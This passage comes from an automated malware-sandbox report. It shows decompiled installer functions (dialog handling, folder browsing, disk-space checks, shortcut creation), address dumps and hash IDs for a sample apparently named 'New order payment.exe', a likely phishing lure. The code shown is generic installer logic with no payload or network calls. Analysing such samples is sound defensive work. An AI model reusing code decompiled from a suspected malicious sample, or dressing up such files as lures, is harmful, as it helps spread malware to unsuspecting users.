							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BBA(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E54(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E54(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423f6c - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42052c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42052c + _t318 * 4) = _t274;
									_t288 =  *( *0x42052c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423f6c; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E89(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E89(_v12);
								L89:
								return E00403EBB(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                                                0x004047f1
                                                                0x004047f7
                                                                0x004047f9
                                                                0x004047ff
                                                                0x00404805
                                                                0x00404808
                                                                0x00404812
                                                                0x0040481b
                                                                0x0040481e
                                                                0x00404821
                                                                0x00404a49
                                                                0x00404a49
                                                                0x00404a50
                                                                0x00404a64
                                                                0x00404a52
                                                                0x00404a54
                                                                0x00404a57
                                                                0x00404a58
                                                                0x00404a5f
                                                                0x00404a5f
                                                                0x00404a67
                                                                0x00404a70
                                                                0x00404a7b
                                                                0x00404a7b
                                                                0x00404a7e
                                                                0x00404a81
                                                                0x00404a90
                                                                0x00404a90
                                                                0x00404a97
                                                                0x00404b0f
                                                                0x00404b0f
                                                                0x00404b12
                                                                0x00404b14
                                                                0x00404b17
                                                                0x00404b1e
                                                                0x00404b2c
                                                                0x00404b2c
                                                                0x00404b2e
                                                                0x00404b31
                                                                0x00404b38
                                                                0x00404b3a
                                                                0x00404b3e
                                                                0x00404b5b
                                                                0x00404b5f
                                                                0x00404b5f
                                                                0x00404b40
                                                                0x00404b4d
                                                                0x00404b4d
                                                                0x00404b3e
                                                                0x00404b38
                                                                0x00000000
                                                                0x00404b12
                                                                0x00404a99
                                                                0x00404a9c
                                                                0x00404aa7
                                                                0x00404aa9
                                                                0x00404aac
                                                                0x00404ab3
                                                                0x00404ab8
                                                                0x00404aba
                                                                0x00404ac4
                                                                0x00404ac4
                                                                0x00404ac8
                                                                0x00404aca
                                                                0x00404acd
                                                                0x00404acf
                                                                0x00404ad2
                                                                0x00404ae8
                                                                0x00404ae8
                                                                0x00404ad4
                                                                0x00404ad4
                                                                0x00404ada
                                                                0x00404adc
                                                                0x00404ae3
                                                                0x00404ade
                                                                0x00404ade
                                                                0x00404ade
                                                                0x00404adc
                                                                0x00404aec
                                                                0x00404aee
                                                                0x00404af3
                                                                0x00404afc
                                                                0x00404afd
                                                                0x00404b07
                                                                0x00404b07
                                                                0x00404b09
                                                                0x00404b0c
                                                                0x00404b0c
                                                                0x00404acd
                                                                0x00000000
                                                                0x00404aba
                                                                0x00404a9e
                                                                0x00404aa1
                                                                0x00404aa5
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00404aa5
                                                                0x00404a83
                                                                0x00404a8a
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00404a72
                                                                0x00404a72
                                                                0x00404a75
                                                                0x00404b62
                                                                0x00404b62
                                                                0x00404b69
                                                                0x00404bdd
                                                                0x00404bdd
                                                                0x00404be4
                                                                0x00404bf0
                                                                0x00404bf0
                                                                0x00404bf2
                                                                0x00404bf9
                                                                0x00404bfb
                                                                0x00404c00
                                                                0x00404c02
                                                                0x00404c05
                                                                0x00404c05
                                                                0x00404c0b
                                                                0x00404c10
                                                                0x00404c12
                                                                0x00404c15
                                                                0x00404c15
                                                                0x00404c1b
                                                                0x00404c21
                                                                0x00404c27
                                                                0x00404c27
                                                                0x00404c2d
                                                                0x00404c34
                                                                0x00404d81
                                                                0x00404d81
                                                                0x00404d88
                                                                0x00404d8a
                                                                0x00404d91
                                                                0x00404d95
                                                                0x00404da2
                                                                0x00404da2
                                                                0x00404da5
                                                                0x00404dab
                                                                0x00404dbd
                                                                0x00404dbd
                                                                0x00404d91
                                                                0x00000000
                                                                0x00404c3a
                                                                0x00404c3c
                                                                0x00404c41
                                                                0x00404c44
                                                                0x00404c48
                                                                0x00404c48
                                                                0x00404c4d
                                                                0x00404c50
                                                                0x00404c91
                                                                0x00404c93
                                                                0x00404c9d
                                                                0x00404ca3
                                                                0x00404ca6
                                                                0x00404cab
                                                                0x00404cb2
                                                                0x00404cb5
                                                                0x00404d57
                                                                0x00404d5d
                                                                0x00404d63
                                                                0x00404d68
                                                                0x00404d6b
                                                                0x00404d7c
                                                                0x00404d7c
                                                                0x00000000
                                                                0x00404cbb
                                                                0x00404cbb
                                                                0x00404cbb
                                                                0x00404cbe
                                                                0x00404cc4
                                                                0x00404cc7
                                                                0x00404cc9
                                                                0x00404ccb
                                                                0x00404ccd
                                                                0x00404cd0
                                                                0x00404cd3
                                                                0x00404cda
                                                                0x00404cdc
                                                                0x00404cdf
                                                                0x00404ce6
                                                                0x00404ce9
                                                                0x00404ce9
                                                                0x00404ce9
                                                                0x00404ce9
                                                                0x00404ced
                                                                0x00404cf0
                                                                0x00404cfc
                                                                0x00404cfd
                                                                0x00404d00
                                                                0x00404d02
                                                                0x00404d02
                                                                0x00404d02
                                                                0x00404cf2
                                                                0x00404cf4
                                                                0x00404cf4
                                                                0x00404d21
                                                                0x00404d21
                                                                0x00404d22
                                                                0x00404d2e
                                                                0x00404d3d
                                                                0x00404d3d
                                                                0x00404d3f
                                                                0x00404d42
                                                                0x00404d4b
                                                                0x00404d4b
                                                                0x00000000
                                                                0x00404cbe
                                                                0x00404c52
                                                                0x00404c5d
                                                                0x00404c60
                                                                0x00404c65
                                                                0x00404c67
                                                                0x00404c69
                                                                0x00404c6b
                                                                0x00404c7b
                                                                0x00404c85
                                                                0x00404c87
                                                                0x00404c8a
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00404c6d
                                                                0x00404c6d
                                                                0x00404c6d
                                                                0x00404c70
                                                                0x00404c73
                                                                0x00404c75
                                                                0x00404c75
                                                                0x00404c75
                                                                0x00404c76
                                                                0x00404c77
                                                                0x00404c77
                                                                0x00000000
                                                                0x00404c6d
                                                                0x00404c50
                                                                0x00404c34
                                                                0x00404b6b
                                                                0x00404b71
                                                                0x00000000
                                                                0x00000000
                                                                0x00404b7d
                                                                0x00404b81
                                                                0x00000000
                                                                0x00000000
                                                                0x00404b91
                                                                0x00404b93
                                                                0x00404b96
                                                                0x00000000
                                                                0x00000000
                                                                0x00404ba8
                                                                0x00404baa
                                                                0x00404bad
                                                                0x00404bb7
                                                                0x00404bb9
                                                                0x00404bba
                                                                0x00404bbb
                                                                0x00404bca
                                                                0x00404bcc
                                                                0x00404bd3
                                                                0x00404bd6
                                                                0x00000000
                                                                0x00404bd6
                                                                0x00404baf
                                                                0x00404bb2
                                                                0x00404bb5
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00404bb5
                                                                0x00000000
                                                                0x00404a75
                                                                0x00404827
                                                                0x0040482c
                                                                0x00404831
                                                                0x00404836
                                                                0x00404837
                                                                0x00404840
                                                                0x0040484b
                                                                0x00404856
                                                                0x0040485c
                                                                0x0040486a
                                                                0x0040487f
                                                                0x00404884
                                                                0x0040488f
                                                                0x00404898
                                                                0x004048ad
                                                                0x004048be
                                                                0x004048cb
                                                                0x004048cb
                                                                0x004048d0
                                                                0x004048d6
                                                                0x004048d8
                                                                0x004048db
                                                                0x004048e0
                                                                0x004048e5
                                                                0x004048e7
                                                                0x004048e7
                                                                0x00404907
                                                                0x00404907
                                                                0x00404909
                                                                0x0040490a
                                                                0x0040490f
                                                                0x00404912
                                                                0x00404915
                                                                0x00404919
                                                                0x0040491e
                                                                0x00404923
                                                                0x00404927
                                                                0x0040492c
                                                                0x00404931
                                                                0x00404933
                                                                0x00404935
                                                                0x0040493b
                                                                0x00404a05
                                                                0x00404a18
                                                                0x00000000
                                                                0x00404941
                                                                0x00404944
                                                                0x00404947
                                                                0x0040494a
                                                                0x0040494a
                                                                0x00404950
                                                                0x00404956
                                                                0x00404959
                                                                0x0040495f
                                                                0x00404960
                                                                0x00404965
                                                                0x0040496e
                                                                0x00404975
                                                                0x00404978
                                                                0x0040497b
                                                                0x0040497e
                                                                0x004049b8
                                                                0x004049ba
                                                                0x004049e3
                                                                0x004049bc
                                                                0x004049c9
                                                                0x004049c9
                                                                0x00404980
                                                                0x00404983
                                                                0x00404992
                                                                0x0040499c
                                                                0x004049a4
                                                                0x004049ab
                                                                0x004049b3
                                                                0x004049b3
                                                                0x0040497e
                                                                0x004049e9
                                                                0x004049ea
                                                                0x004049f0
                                                                0x004049f6
                                                                0x004049f6
                                                                0x00404a03
                                                                0x00404a1e
                                                                0x00404a22
                                                                0x00404a3f
                                                                0x00404a44
                                                                0x00404a47
                                                                0x00404a47
                                                                0x00000000
                                                                0x00404a24
                                                                0x00404a29
                                                                0x00404a32
                                                                0x00404dbf
                                                                0x00404dd1
                                                                0x00404dd1
                                                                0x00404a22
                                                                0x00000000
                                                                0x00404a03
                                                                0x0040493b

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                • String ID: $M$N
                                                                • API String ID: 1638840714-813528018
                                                                • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                                • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                                                • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                                • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00404292, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 78%
                                                                			E00404292(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd08;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040543D(0x3fb, _t146);
					E00405DFA(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040543D(0x3fb, _t146);
							if(E0040576C(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405B98(0x41f500, _t146);
							_t87 = E00405F28(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405B98(0x41f500, _t146);
								_t89 = E0040571F(0x41f500);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f500,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f500) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f500,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E004056D2(0x41f500) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f500) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404726(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42371c; // 0x7783bd
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040470E(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f4f0);
									} else {
										E00404649(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x423fe4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403E76(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420524 == _t158) {
									E00404227();
								}
								 *0x420524 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420538;
							_v60 = E004045E3;
							_v56 = _t146;
							_v68 = E00405BBA(_t146, 0x420538, _t166, 0x41f908, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040568B(_t146);
								_t124 =  *0x423f50; // 0x771a18
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E00405BBA(_t146, 0x420538, _t166, 0, _t125);
									if(lstrcmpiA(0x422ee0, 0x420538) != 0) {
										lstrcatA(_t146, 0x422ee0);
									}
								}
								 *0x420524 =  *0x420524 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004056F8(_t146) != 0 && E0040571F(_t146) == 0) {
						E0040568B(_t146);
					}
					 *0x423718 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E54(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E54(_t166);
					E00403E89(_t165);
					_t138 = E00405F28(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EBB(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                                0x00404292
                                                                0x00404298
                                                                0x0040429e
                                                                0x004042ab
                                                                0x004042b9
                                                                0x004042bc
                                                                0x004042c4
                                                                0x004042ca
                                                                0x004042ca
                                                                0x004042d6
                                                                0x004042d9
                                                                0x00404347
                                                                0x0040434e
                                                                0x00404425
                                                                0x0040442c
                                                                0x0040443b
                                                                0x0040443b
                                                                0x0040443f
                                                                0x00404449
                                                                0x00404456
                                                                0x00404458
                                                                0x00404458
                                                                0x00404466
                                                                0x0040446d
                                                                0x00404474
                                                                0x00404477
                                                                0x004044ae
                                                                0x004044b0
                                                                0x004044b6
                                                                0x004044bb
                                                                0x004044bf
                                                                0x004044c1
                                                                0x004044c1
                                                                0x004044dd
                                                                0x00000000
                                                                0x004044df
                                                                0x004044e2
                                                                0x004044f0
                                                                0x004044f6
                                                                0x004044f7
                                                                0x004044fa
                                                                0x004044fd
                                                                0x00000000
                                                                0x004044fd
                                                                0x00404479
                                                                0x0040447b
                                                                0x0040447f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00404481
                                                                0x00404481
                                                                0x0040448e
                                                                0x00404493
                                                                0x00000000
                                                                0x00000000
                                                                0x00404497
                                                                0x00404499
                                                                0x00404499
                                                                0x004044a4
                                                                0x004044a7
                                                                0x004044ac
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004044ac
                                                                0x00404509
                                                                0x00404513
                                                                0x00404516
                                                                0x00404519
                                                                0x00404520
                                                                0x00404520
                                                                0x00404522
                                                                0x00404522
                                                                0x00404527
                                                                0x00404529
                                                                0x00404531
                                                                0x00404538
                                                                0x0040453a
                                                                0x00404545
                                                                0x00404545
                                                                0x0040453a
                                                                0x0040454c
                                                                0x00404555
                                                                0x0040455f
                                                                0x00404567
                                                                0x00404582
                                                                0x00404569
                                                                0x00404572
                                                                0x00404572
                                                                0x00404567
                                                                0x00404587
                                                                0x0040458c
                                                                0x00404591
                                                                0x0040459a
                                                                0x0040459a
                                                                0x004045a3
                                                                0x004045a5
                                                                0x004045a5
                                                                0x004045b1
                                                                0x004045b9
                                                                0x004045c3
                                                                0x004045c3
                                                                0x004045c8
                                                                0x00000000
                                                                0x004045c8
                                                                0x00404477
                                                                0x0040442e
                                                                0x00404435
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00404435
                                                                0x00404354
                                                                0x0040435d
                                                                0x00404377
                                                                0x0040437c
                                                                0x00404386
                                                                0x0040438d
                                                                0x00404399
                                                                0x0040439c
                                                                0x0040439f
                                                                0x004043a6
                                                                0x004043ae
                                                                0x004043b1
                                                                0x004043b5
                                                                0x004043bc
                                                                0x004043c4
                                                                0x0040441e
                                                                0x004043c6
                                                                0x004043c7
                                                                0x004043ce
                                                                0x004043d3
                                                                0x004043d8
                                                                0x004043e0
                                                                0x004043ed
                                                                0x00404401
                                                                0x00404405
                                                                0x00404405
                                                                0x00404401
                                                                0x0040440a
                                                                0x00404417
                                                                0x00404417
                                                                0x004043c4
                                                                0x00000000
                                                                0x0040437c
                                                                0x0040436a
                                                                0x00000000
                                                                0x00000000
                                                                0x00404370
                                                                0x00000000
                                                                0x004042db
                                                                0x004042e8
                                                                0x004042f1
                                                                0x004042fe
                                                                0x004042fe
                                                                0x00404305
                                                                0x0040430b
                                                                0x00404314
                                                                0x00404317
                                                                0x0040431a
                                                                0x00404322
                                                                0x00404325
                                                                0x00404328
                                                                0x0040432e
                                                                0x00404335
                                                                0x0040433c
                                                                0x004045ce
                                                                0x004045e0
                                                                0x00404342
                                                                0x00404345
                                                                0x00000000
                                                                0x00404345
                                                                0x0040433c

                                                                APIs
                                                                • GetDlgItem.USER32 ref: 004042E1
                                                                • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                                                • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                                                • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                                                • lstrcmpiA.KERNEL32(sclag,00420538,00000000,?,?), ref: 004043F9
                                                                • lstrcatA.KERNEL32(?,sclag), ref: 00404405
                                                                • SetDlgItemTextA.USER32 ref: 00404417
                                                                  • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                                                  • Part of subcall function 00405DFA: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\New order payment.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                                                  • Part of subcall function 00405DFA: CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                                                  • Part of subcall function 00405DFA: CharNextA.USER32(?,"C:\Users\user\Desktop\New order payment.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                                                  • Part of subcall function 00405DFA: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                                                • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044F0
                                                                  • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                                  • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                                                  • Part of subcall function 00404649: SetDlgItemTextA.USER32 ref: 00404702
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: A$C:\Users\user\AppData\Local\Temp$sclag
                                                                • API String ID: 2624150263-1591552219
                                                                • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                                • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                                                • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                                • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 74%
                                                                			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E004056F8(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409408, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409408, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                0x0040205c
                                                                0x00402066
                                                                0x0040206f
                                                                0x00402079
                                                                0x00402082
                                                                0x0040208c
                                                                0x00402090
                                                                0x00402090
                                                                0x00402095
                                                                0x004020a6
                                                                0x004020ae
                                                                0x0040218e
                                                                0x0040218e
                                                                0x00402195
                                                                0x004020b4
                                                                0x004020b4
                                                                0x004020c5
                                                                0x004020c9
                                                                0x004020cf
                                                                0x004020d9
                                                                0x004020db
                                                                0x004020e6
                                                                0x004020e9
                                                                0x004020f6
                                                                0x004020f8
                                                                0x004020fa
                                                                0x00402101
                                                                0x00402104
                                                                0x00402104
                                                                0x00402107
                                                                0x00402111
                                                                0x00402119
                                                                0x0040211e
                                                                0x0040212a
                                                                0x0040212a
                                                                0x0040212d
                                                                0x00402136
                                                                0x00402139
                                                                0x00402142
                                                                0x00402147
                                                                0x00402159
                                                                0x00402168
                                                                0x0040216a
                                                                0x00402176
                                                                0x00402176
                                                                0x00402168
                                                                0x00402178
                                                                0x0040217e
                                                                0x0040217e
                                                                0x00402181
                                                                0x00402187
